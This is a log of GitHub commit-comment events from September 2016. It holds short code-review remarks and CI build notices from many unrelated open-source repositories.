{"id":"4568838658","type":"CommitCommentEvent","actor":{"login":"PangolinPaw"},"repo":{"name":"PangolinPaw/V.Au.L.T."},"payload":{"comment":{"id":19038612,"position":null,"line":null,"path":null,"commit_id":"74221d68b99b37bc1b92a101a8aa05d5dcb9c2e9","created_at":"2016-09-15T15:31:08Z","updated_at":"2016-09-15T15:31:08Z","body":"Version 1 of the automated translation tool used separate database tables for each machine category. VAuLT uses a single table and so there is no need for the user to select a category before a function."}},"created_at":"2016-09-15T15:31:08Z"}
{"id":"4568844377","type":"CommitCommentEvent","actor":{"login":"RunoFawkes"},"repo":{"name":"RunoFawkes/Source-Code-Inspection"},"payload":{"comment":{"id":19038629,"position":null,"line":null,"path":null,"commit_id":"d6287b1257f6bd7247031abdab08e3293fab97e1","created_at":"2016-09-15T15:32:04Z","updated_at":"2016-09-15T15:32:04Z","body":"This is marked as a deletion because I actually had accidentally reuploaded it in another folder xD"}},"created_at":"2016-09-15T15:32:04Z"}
{"id":"4568847521","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19038642,"position":null,"line":null,"path":null,"commit_id":"fb4da272efd6b2a9533d45cf42a299016359c4c0","created_at":"2016-09-15T15:32:35Z","updated_at":"2016-09-15T15:32:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1015](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13375&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T15:32:35Z"}
{"id":"4568849529","type":"CommitCommentEvent","actor":{"login":"ricellis"},"repo":{"name":"cloudant/swift-cloudant"},"payload":{"comment":{"id":19038646,"position":8,"line":420,"path":"Source/URLSession.swift","commit_id":"b6e689a6b5c5ab35c430f097974958709f9f1459","created_at":"2016-09-15T15:32:53Z","updated_at":"2016-09-15T15:32:53Z","body":"Ha I didn't see this one before, but there is still a typo in it now"}},"created_at":"2016-09-15T15:32:53Z"}
{"id":"4568852566","type":"CommitCommentEvent","actor":{"login":"leodemoura"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19038651,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T15:33:23Z","updated_at":"2016-09-15T15:33:23Z","body":"@avigad Using `pose` is problematic since we currently have a tactic called `pose`. We would have to rename it since `pose` would become a keyword if we use the ssreflect approach."}},"created_at":"2016-09-15T15:33:23Z"}
{"id":"4568854996","type":"CommitCommentEvent","actor":{"login":"jmmcd"},"repo":{"name":"jmmcd/PonyGE2"},"payload":{"comment":{"id":19038653,"position":null,"line":null,"path":null,"commit_id":"42bf5f90dada887dcfed22b187edd6e47d17bc29","created_at":"2016-09-15T15:33:44Z","updated_at":"2016-09-15T15:33:44Z","body":"No, classification.\n\nOn 15 September 2016 at 14:54, Michael Fenton <notifications@github.com>\nwrote:\n\n> Is this a regression problem?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jmmcd/PonyGE2/commit/42bf5f90dada887dcfed22b187edd6e47d17bc29#commitcomment-19036659>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAKQBnelWlBuf0qmXs5HGLAoJM_KHDwNks5qqU4XgaJpZM4J95Zu>\n> .\n>\n\n\n\n-- \nDr. James McDermott\nLecturer in Business Analytics\nProgramme Director, MSc in Business Analytics\nD209 UCD Michael Smurfit Graduate Business School\nCollege of Business, University College Dublin, Ireland.\nPhone +353 1 716 8031\nhttp://jmmcd.net\nhttp://www.ucd.ie/cba/members/jamesmcdermott/\n"}},"created_at":"2016-09-15T15:33:44Z"}
{"id":"4568857951","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19038661,"position":null,"line":null,"path":null,"commit_id":"d968244049c2e287639ee3858d7901f14f994e6a","created_at":"2016-09-15T15:34:14Z","updated_at":"2016-09-15T15:34:14Z","body":"TaskCluster: @nurav does not have permission to trigger tasks."}},"created_at":"2016-09-15T15:34:14Z"}
{"id":"4568861775","type":"CommitCommentEvent","actor":{"login":"avigad"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19038675,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T15:34:49Z","updated_at":"2016-09-15T15:34:49Z","body":"Sean has convinced me that `obtain ... := ...` sounds funny. Going back to `let` seems reasonable. Using the word `pose` instead is one way to make the distinction clear. I am o.k. with any of these options."}},"created_at":"2016-09-15T15:34:49Z"}
{"id":"4568866586","type":"CommitCommentEvent","actor":{"login":"avigad"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19038685,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T15:35:36Z","updated_at":"2016-09-15T15:35:36Z","body":"Sorry, our messages overlapped... The point is well taken."}},"created_at":"2016-09-15T15:35:36Z"}
{"id":"4568869586","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19038692,"position":12,"line":160,"path":"src/support.cpp","commit_id":"a2c5a73f093dfa2f4074f2a8e60aa9c9f3a441d5","created_at":"2016-09-15T15:36:03Z","updated_at":"2016-09-15T15:36:03Z","body":"I could, but the variable is valid (name is intuitive for the value) outside of this scope, so I didn't see a reason to."}},"created_at":"2016-09-15T15:36:03Z"}
{"id":"4568870229","type":"CommitCommentEvent","actor":{"login":"jason-womack"},"repo":{"name":"mike-tutkowski/cloudstack"},"payload":{"comment":{"id":19038694,"position":8,"line":26,"path":"plugins/storage/volume/solidfire/pom.xml","commit_id":"4ed6a7217b18d8e356aeb26867736c5a9432eade","created_at":"2016-09-15T15:36:11Z","updated_at":"2016-09-15T15:36:11Z","body":"Are you sure you want to expose the internal repo, even if you are going to swap it out next week.  Seems like info that we just don't want getting out."}},"created_at":"2016-09-15T15:36:11Z"}
{"id":"4568873765","type":"CommitCommentEvent","actor":{"login":"mikefenton"},"repo":{"name":"jmmcd/PonyGE2"},"payload":{"comment":{"id":19038699,"position":null,"line":null,"path":null,"commit_id":"42bf5f90dada887dcfed22b187edd6e47d17bc29","created_at":"2016-09-15T15:36:42Z","updated_at":"2016-09-15T15:36:42Z","body":"Ah right cool, we should add in the fact that we have a classification problem into the readme and docs. "}},"created_at":"2016-09-15T15:36:42Z"}
{"id":"4568883321","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19038723,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T15:38:15Z","updated_at":"2016-09-15T15:38:15Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T15:38:15Z"}
{"id":"4568884644","type":"CommitCommentEvent","actor":{"login":"sherzberg"},"repo":{"name":"andygrunwald/megos"},"payload":{"comment":{"id":19038726,"position":null,"line":null,"path":null,"commit_id":"476211b25600d683452a6e2cf1192aae7a1f37e4","created_at":"2016-09-15T15:38:27Z","updated_at":"2016-09-15T15:38:27Z","body":"Should the README be updated for this as well?"}},"created_at":"2016-09-15T15:38:27Z"}
{"id":"4568887080","type":"CommitCommentEvent","actor":{"login":"davidwhitman"},"repo":{"name":"endless-sky/endless-sky.github.io"},"payload":{"comment":{"id":19038734,"position":null,"line":null,"path":null,"commit_id":"e3b7c3542d8788c23dd9ad4f1f6e93390eae4be5","created_at":"2016-09-15T15:38:49Z","updated_at":"2016-09-15T15:38:49Z","body":"Do you have a wishlist for the \"unwashed masses\" mod page? \r\n\r\nI won't promise anything (cue disgruntled nod from my abandoned Play Store app), but a small list of things to improve on would be something easy to aim at. "}},"created_at":"2016-09-15T15:38:49Z"}
{"id":"4568896641","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19038769,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T15:40:23Z","updated_at":"2016-09-15T15:40:23Z","body":"Proximity Sensor: I don't think that EventHub thing matters... probably just due to our outdated kernel... Does proximity work? You can check with Android sensor box app."}},"created_at":"2016-09-15T15:40:23Z"}
{"id":"4568900419","type":"CommitCommentEvent","actor":{"login":"grisaitis"},"repo":{"name":"TuragaLab/PyGreentea"},"payload":{"comment":{"id":19038776,"position":4,"line":66,"path":"data_io/dataset_reading.py","commit_id":"50be17ebcbee787ac87555fcb25db6aa8a52d2e9","created_at":"2016-09-15T15:40:59Z","updated_at":"2016-09-15T15:40:59Z","body":"i see. so we want components to erode everywhere except:\r\n* certain axes, e.g. the z-axis\r\n* at the edge of the unmasked area\r\n* at the edge of the source array\r\n\r\nis that right?"}},"created_at":"2016-09-15T15:40:59Z"}
{"id":"4568901961","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19038781,"position":93,"line":2160,"path":"commands.js","commit_id":"28c0a2a22c8522e8889d97ff6c6cbdc99cfb17a8","created_at":"2016-09-15T15:41:15Z","updated_at":"2016-09-15T15:41:15Z","body":"This should send a reply"}},"created_at":"2016-09-15T15:41:15Z"}
{"id":"4568903259","type":"CommitCommentEvent","actor":{"login":"jefferai"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19038783,"position":null,"line":null,"path":null,"commit_id":"9fb11c44036f2a5ff20a1a35bd7d687ec9117451","created_at":"2016-09-15T15:41:27Z","updated_at":"2016-09-15T15:41:27Z","body":"Didn't insist on it being this way, mostly I thought if `|=` would work it'd be simpler. But either is fine!"}},"created_at":"2016-09-15T15:41:27Z"}
{"id":"4568904183","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19038787,"position":null,"line":null,"path":null,"commit_id":"fb4da272efd6b2a9533d45cf42a299016359c4c0","created_at":"2016-09-15T15:41:35Z","updated_at":"2016-09-15T15:41:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1015](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13375&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:09:00"}},"created_at":"2016-09-15T15:41:35Z"}
{"id":"4568904576","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Jinmo/pcap_test"},"payload":{"comment":{"id":19038788,"position":69,"line":69,"path":"pcap_test.cc","commit_id":"ea6f6b384bd0b37375e4b6ecae21ccd60d41a034","created_at":"2016-09-15T15:41:38Z","updated_at":"2016-09-15T15:41:38Z","body":"You'd better check pcap_next_ex return value not only 1, but also -2, -1 and 0.\r\nFor more information, see http://www.tcpdump.org/manpages/pcap_next_ex.3pcap.html ."}},"created_at":"2016-09-15T15:41:38Z"}
{"id":"4568904971","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038789,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:41:42Z","updated_at":"2016-09-15T15:41:42Z","body":"Exactly.\r\n\r\n"}},"created_at":"2016-09-15T15:41:42Z"}
{"id":"4568905958","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19038794,"position":95,"line":2162,"path":"commands.js","commit_id":"28c0a2a22c8522e8889d97ff6c6cbdc99cfb17a8","created_at":"2016-09-15T15:41:50Z","updated_at":"2016-09-15T15:41:50Z","body":".map(toId)? "}},"created_at":"2016-09-15T15:41:50Z"}
{"id":"4568910203","type":"CommitCommentEvent","actor":{"login":"nicatronTg"},"repo":{"name":"NyxStudios/TerrariaAPI-Server"},"payload":{"comment":{"id":19038811,"position":6,"line":96,"path":"TerrariaServer.csproj","commit_id":"afe8d74fdf3911f3816abda3f4940fef70bb0a1a","created_at":"2016-09-15T15:42:29Z","updated_at":"2016-09-15T15:42:29Z","body":"BAD BAD BAD @ProfessorXZ BAD BAD BAD"}},"created_at":"2016-09-15T15:42:29Z"}
{"id":"4568912235","type":"CommitCommentEvent","actor":{"login":"MatrixFrog"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19038817,"position":65,"line":2360,"path":"src/com/google/javascript/jscomp/Compiler.java","commit_id":"31e5b5199eaf3fdb8920dc779cf71c99f046a1fe","created_at":"2016-09-15T15:42:48Z","updated_at":"2016-09-15T15:42:48Z","body":"@mihaip that's probably fine.\r\n@ChadKillingsworth that's a good idea too. I don't think we have much React usage at Google (though I may be wrong) but if it's helpful for others I think we wouldn't mind having it in the codebase."}},"created_at":"2016-09-15T15:42:48Z"}
{"id":"4568913092","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19038823,"position":null,"line":null,"path":null,"commit_id":"f179f0bea2f33fe2f3ba7b91e767fd76e40a7303","created_at":"2016-09-15T15:42:57Z","updated_at":"2016-09-15T15:42:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1016](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13379&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T15:42:57Z"}
{"id":"4568913907","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19038831,"position":null,"line":null,"path":null,"commit_id":"b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7","created_at":"2016-09-15T15:43:05Z","updated_at":"2016-09-15T15:43:05Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T15:43:05Z"}
{"id":"4568914296","type":"CommitCommentEvent","actor":{"login":"nicatronTg"},"repo":{"name":"NyxStudios/TerrariaAPI-Server"},"payload":{"comment":{"id":19038836,"position":7,"line":97,"path":"TerrariaServer.csproj","commit_id":"4fc19ae8a49b975d36f857bb6a9eeeb17ebfdbb5","created_at":"2016-09-15T15:43:10Z","updated_at":"2016-09-15T15:43:10Z","body":"COME ON BRO it's supposed to be ..\\packages don't you know what's going on"}},"created_at":"2016-09-15T15:43:10Z"}
{"id":"4568915772","type":"CommitCommentEvent","actor":{"login":"MrAE"},"repo":{"name":"neurodata/synaptome-stats"},"payload":{"comment":{"id":19038837,"position":null,"line":null,"path":null,"commit_id":"f6e74bcc4544f7891e6d43bcb448915990cb7f99","created_at":"2016-09-15T15:43:24Z","updated_at":"2016-09-15T15:43:24Z","body":"@jovo mclust model names to be compared with [BIC](http://docs.neurodata.io/synaptome-stats/Code/BIC.html): \r\n![mclust model names](https://cloud.githubusercontent.com/assets/6886669/18556478/68f4cbee-7b39-11e6-97d7-bb474933727b.png)"}},"created_at":"2016-09-15T15:43:24Z"}
{"id":"4568916571","type":"CommitCommentEvent","actor":{"login":"spl"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19038840,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T15:43:31Z","updated_at":"2016-09-15T15:43:31Z","body":"Now you've got me worried that I might be the [lone voice in the wilderness](http://idioms.thefreedictionary.com/a+voice+in+the+wilderness) who only happens to be paying a bit of attention. 😟 Anyway, didn't mean to make a fuss, but maybe you'll want to keep an eye out for alternative syntax if this `let` confuses people."}},"created_at":"2016-09-15T15:43:31Z"}
{"id":"4568923740","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19038859,"position":221,"line":2288,"path":"commands.js","commit_id":"28c0a2a22c8522e8889d97ff6c6cbdc99cfb17a8","created_at":"2016-09-15T15:44:42Z","updated_at":"2016-09-15T15:44:42Z","body":"Two-letter alias?\r\nRevert imo"}},"created_at":"2016-09-15T15:44:42Z"}
{"id":"4568924260","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19038860,"position":35,"line":47,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/AccessorForConstructorDescriptor.kt","commit_id":"f20c9f88343220ea1640d395b3e1fbd3247ae4da","created_at":"2016-09-15T15:44:47Z","updated_at":"2016-09-15T15:44:47Z","body":"Why have you deleted the exception message?"}},"created_at":"2016-09-15T15:44:47Z"}
{"id":"4568926271","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19038865,"position":223,"line":2290,"path":"commands.js","commit_id":"28c0a2a22c8522e8889d97ff6c6cbdc99cfb17a8","created_at":"2016-09-15T15:45:08Z","updated_at":"2016-09-15T15:45:08Z","body":"We don't alias punishment reversions..."}},"created_at":"2016-09-15T15:45:08Z"}
{"id":"4568929201","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038873,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:45:36Z","updated_at":"2016-09-15T15:45:36Z","body":"I do not understand why running task manually is necessary ?"}},"created_at":"2016-09-15T15:45:36Z"}
{"id":"4568931308","type":"CommitCommentEvent","actor":{"login":"Maxooo"},"repo":{"name":"spyrit/DoctrineDatagridBundle"},"payload":{"comment":{"id":19038884,"position":5,"line":221,"path":"Datagrid/DoctrineDatagrid.php","commit_id":"59cf58dd79426e8b9951f84e49f999468d4ff5fc","created_at":"2016-09-15T15:45:56Z","updated_at":"2016-09-15T15:45:56Z","body":"👍 "}},"created_at":"2016-09-15T15:45:56Z"}
{"id":"4568935183","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Jinmo/pcap_test"},"payload":{"comment":{"id":19038892,"position":97,"line":97,"path":"pcap_test.cc","commit_id":"ea6f6b384bd0b37375e4b6ecae21ccd60d41a034","created_at":"2016-09-15T15:46:32Z","updated_at":"2016-09-15T15:46:32Z","body":"IP header size can be calculated with the following code.\r\n(ip->ip_hl * 4)"}},"created_at":"2016-09-15T15:46:32Z"}
{"id":"4568938768","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19038904,"position":null,"line":null,"path":null,"commit_id":"e1fa9b26a838a233949b55ca9672181edef6f289","created_at":"2016-09-15T15:47:05Z","updated_at":"2016-09-15T15:47:05Z","body":"Also see [Issue 275: Remove CMake from Release ZIP](http://github.com/weidai11/cryptopp/issues/275)."}},"created_at":"2016-09-15T15:47:05Z"}
{"id":"4568939325","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19038906,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T15:47:11Z","updated_at":"2016-09-15T15:47:11Z","body":"yeah.  this won't work.\r\n\r\nPreviously I had a workaround for this, but now I think we should always autobox when passing multireturn types as arguments."}},"created_at":"2016-09-15T15:47:11Z"}
{"id":"4568939560","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Jinmo/pcap_test"},"payload":{"comment":{"id":19038907,"position":98,"line":98,"path":"pcap_test.cc","commit_id":"ea6f6b384bd0b37375e4b6ecae21ccd60d41a034","created_at":"2016-09-15T15:47:14Z","updated_at":"2016-09-15T15:47:14Z","body":"same as the above mentioned."}},"created_at":"2016-09-15T15:47:14Z"}
{"id":"4568940451","type":"CommitCommentEvent","actor":{"login":"alanclayton"},"repo":{"name":"Rise-Vision/risevision-documentation"},"payload":{"comment":{"id":19038908,"position":14,"line":177,"path":"_posts/user/2015-06-16-create-a-display.md","commit_id":"b7a2737bacf2cd8c81e8ef05809c7953b50de918","created_at":"2016-09-15T15:47:23Z","updated_at":"2016-09-15T15:47:23Z","body":"@btfrise The App is not published in the Store. Did you try searching for the app using the key? Did it work for you?"}},"created_at":"2016-09-15T15:47:23Z"}
{"id":"4568942530","type":"CommitCommentEvent","actor":{"login":"aCandy"},"repo":{"name":"aCandy/Travels"},"payload":{"comment":{"id":19038916,"position":null,"line":null,"path":null,"commit_id":"9a0856b68e0192eccb8efef78b5f68b31976cd66","created_at":"2016-09-15T15:47:42Z","updated_at":"2016-09-15T15:47:42Z","body":"551456"}},"created_at":"2016-09-15T15:47:42Z"}
{"id":"4568947371","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"Jinmo/pcap_test"},"payload":{"comment":{"id":19038930,"position":9,"line":9,"path":"pcap_test.cc","commit_id":"ea6f6b384bd0b37375e4b6ecae21ccd60d41a034","created_at":"2016-09-15T15:48:28Z","updated_at":"2016-09-15T15:48:28Z","body":"How about using \"assert\"? :)"}},"created_at":"2016-09-15T15:48:28Z"}
{"id":"4568954833","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19038943,"position":null,"line":null,"path":null,"commit_id":"1f7bc4a6b7b4d7dcf2b37c2272ced1915a4092b1","created_at":"2016-09-15T15:49:30Z","updated_at":"2016-09-15T15:49:30Z","body":"[R/ABC_SMC.R:186:1:](https://github.com/richelbilderbeek/nLTT/blob/1f7bc4a6b7b4d7dcf2b37c2272ced1915a4092b1/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```"}},"created_at":"2016-09-15T15:49:30Z"}
{"id":"4568956785","type":"CommitCommentEvent","actor":{"login":"mundayst"},"repo":{"name":"stephanie1234/git_training"},"payload":{"comment":{"id":19038948,"position":null,"line":null,"path":null,"commit_id":"07dd98b5eae3594107a1080d410612465c9b66fe","created_at":"2016-09-15T15:49:46Z","updated_at":"2016-09-15T15:49:46Z","body":":dancer: "}},"created_at":"2016-09-15T15:49:46Z"}
{"id":"4568959193","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038955,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:50:09Z","updated_at":"2016-09-15T15:50:09Z","body":"I propose:  `new ConcurrentHashMap<>()` :)\r\nWhy did we need this optimization for this map specifically ?"}},"created_at":"2016-09-15T15:50:09Z"}
{"id":"4568959259","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"anthrotype/fonttools"},"payload":{"comment":{"id":19038956,"position":null,"line":null,"path":null,"commit_id":"e1859815ca52567f38f95051b17f8859833e98b9","created_at":"2016-09-15T15:50:10Z","updated_at":"2016-09-15T15:50:10Z","body":"This is the wrong fix, please ignore."}},"created_at":"2016-09-15T15:50:10Z"}
{"id":"4568960395","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19038959,"position":null,"line":null,"path":null,"commit_id":"a5195029320801dd502cc65b2dc3b5ca9d6d7ca8","created_at":"2016-09-15T15:50:22Z","updated_at":"2016-09-15T15:50:22Z","body":"AOSP, at least. No clue what Amazon might have done...\r\nSPDIF is the name of their IEC61937 encapsulation component, which is highly lacking..."}},"created_at":"2016-09-15T15:50:22Z"}
{"id":"4568960459","type":"CommitCommentEvent","actor":{"login":"mundayst"},"repo":{"name":"stephanie1234/git_training"},"payload":{"comment":{"id":19038960,"position":null,"line":null,"path":null,"commit_id":"07dd98b5eae3594107a1080d410612465c9b66fe","created_at":"2016-09-15T15:50:23Z","updated_at":"2016-09-15T15:50:23Z","body":":smiley: "}},"created_at":"2016-09-15T15:50:23Z"}
{"id":"4568961759","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19038963,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T15:50:35Z","updated_at":"2016-09-15T15:50:35Z","body":"Well, that was done by the code you removed :)\r\n\r\nI think instead if should handle `TBlock`s and only skip boxing for block-level multi-return calls."}},"created_at":"2016-09-15T15:50:35Z"}
{"id":"4568962483","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19038967,"position":null,"line":null,"path":null,"commit_id":"f179f0bea2f33fe2f3ba7b91e767fd76e40a7303","created_at":"2016-09-15T15:50:41Z","updated_at":"2016-09-15T15:50:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1016](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13379&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 239, ignored: 3 Build time: 00:07:44"}},"created_at":"2016-09-15T15:50:41Z"}
{"id":"4568967330","type":"CommitCommentEvent","actor":{"login":"fundon"},"repo":{"name":"trekjs/middleware"},"payload":{"comment":{"id":19038976,"position":null,"line":null,"path":null,"commit_id":"d8780976892a4a6412d9d4d74046d840fb657b0a","created_at":"2016-09-15T15:51:28Z","updated_at":"2016-09-15T15:51:28Z","body":"已经修复无限循环问题，总体来说跟 koa-compose@next 不相上下\r\n/cc @zensh "}},"created_at":"2016-09-15T15:51:28Z"}
{"id":"4568967734","type":"CommitCommentEvent","actor":{"login":"Mumiji"},"repo":{"name":"Mumiji/wewBot"},"payload":{"comment":{"id":19038978,"position":null,"line":null,"path":null,"commit_id":"c012b1e9a4bc33975c304d4dcfd3968e58220b6d","created_at":"2016-09-15T15:51:31Z","updated_at":"2016-09-15T15:51:31Z","body":"sorry, owner of the bot* set in the id"}},"created_at":"2016-09-15T15:51:31Z"}
{"id":"4568968228","type":"CommitCommentEvent","actor":{"login":"respoke-ci"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19038979,"position":null,"line":null,"path":null,"commit_id":"e74648a10bfdb8199adcacebe2e04ef449eab02a","created_at":"2016-09-15T15:51:35Z","updated_at":"2016-09-15T15:51:35Z","body":"/me thanks mr skeltal. "}},"created_at":"2016-09-15T15:51:35Z"}
{"id":"4568968601","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19038980,"position":49,"line":126,"path":"core/descriptors/src/org/jetbrains/kotlin/descriptors/impl/TypeAliasConstructorDescriptor.kt","commit_id":"f20c9f88343220ea1640d395b3e1fbd3247ae4da","created_at":"2016-09-15T15:51:38Z","updated_at":"2016-09-15T15:51:38Z","body":"Looks like this cast should be unnecessary"}},"created_at":"2016-09-15T15:51:38Z"}
{"id":"4568969221","type":"CommitCommentEvent","actor":{"login":"harshadyeola"},"repo":{"name":"ShoppinPal/warehouse"},"payload":{"comment":{"id":19038982,"position":14,"line":21,"path":"package.json","commit_id":"e3e9a13d701677953fb2c985dc32d1c0beb969ff","created_at":"2016-09-15T15:51:44Z","updated_at":"2016-09-15T15:51:44Z","body":"@pulkitsinghal @ysg410 \r\ncan you test with this branch if this module is working perfectly? so that I can generate PR."}},"created_at":"2016-09-15T15:51:44Z"}
{"id":"4568974593","type":"CommitCommentEvent","actor":{"login":"umdp"},"repo":{"name":"lfq7413/tomato"},"payload":{"comment":{"id":19038991,"position":43,"line":78,"path":"tomato.go","commit_id":"8a480d601839349134767c22b5700c08aca233d7","created_at":"2016-09-15T15:52:36Z","updated_at":"2016-09-15T15:52:36Z","body":"in this line the body unmarshaled and in the following line unmarshal is called again\r\nhttps://github.com/lfq7413/tomato/blob/master/controllers/base.go#L85\r\n\r\n"}},"created_at":"2016-09-15T15:52:36Z"}
